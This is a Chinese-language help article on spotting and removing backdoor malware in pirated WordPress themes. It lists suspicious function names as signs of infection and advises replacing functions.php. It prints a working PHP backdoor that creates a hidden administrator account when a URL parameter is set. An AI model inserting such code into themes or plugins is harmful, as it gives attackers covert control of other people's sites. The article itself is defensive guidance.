wordpress主题存在后门恶意代码该怎么办？ - Word

wordpress主题存在后门恶意代码该怎么办？

wordpress越来越强大,也伴随着出现越来越多的主题,除了有大量官方的主题,也有许多主题设计者发布收费主题和免费主题,很多不良人收集各种主题回来测试然后添加暗链、广告，甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的,对不懂代码的童鞋来说,那是致命的.

怎么才知道自己的主题感染了恶意代码呢？

换主题经常出错提示[Fatal error: Cannot redeclare _check_isactive_widget()]、]_get_allwidgetcont] 之类的那么很有可能你已经被感染了，而且在你换主题的时候还会复制恶意代码到你的新主题里去。如果出现了黑链、陌生链接和不明广告，很可能就是主题存在恶意代码！

都去检查一下functions.php文件查一下是否有以下代码，如果你的functions.php中有以下任意一段代码，那么你可能就中招了。

add_action([admin_head],    add_action([init], [_getprepare_widget]); 

下面几个是常见的恶意代码:

_verify_isactivate_widgets     _check_isactive_widget     _get_allwidgetscont     _prepare_widgets     __popular_posts 

新增一段代码开头含有:

_verifyactivate_widgets

_verifyactivate_widget

下面的代码更加狠,可以自动添加一个角色为管理员的用户.

add_action( 'wp_head' ,  'holeinthewall' );  function  holeinthewall() {  If ( $_GET [ 'backdoor' ] ==  'go' ) {  require ( 'wp-includes/registration.php' );  If (!username_exists( 'username' )) {  $user_id  = wp_create_user( 'username' ,  'password' );  $user  =  new  WP_User( $user_id );  $user ->set_role( 'administrator' );  }  //phpfensi.com   }  } 

将代码添加到您当前主题的 functions.php 文件或插件中,会自动创建一个用户名:username 密码:password的有管理员权限的用户,之后想做什么都可以了,这些恶意代码被添加后,主题看不出任意异常,只有在functions.php检查才能发现,防不胜防！所以大家尽量到官方或原始发布站点下载主题,少用盗版主题和插件以免被开了后门也不知晓.

解决办法:

1、如果是主题本身自带的恶意代码就去原发布地址下载主题重新安装,官方的和原发布地址的百分之90是不会有恶意代码的.

2、如果是感染了恶意代码的找到functions.php 文件用原文件替换掉

3、删除恶意代码,一般就是以上任意一段代码之后的所有代码,这段代码前面还有一个<?PHP,一起删掉.

查看更多关于wordpress主题存在后门恶意代码该怎么办？ - Word的详细内容...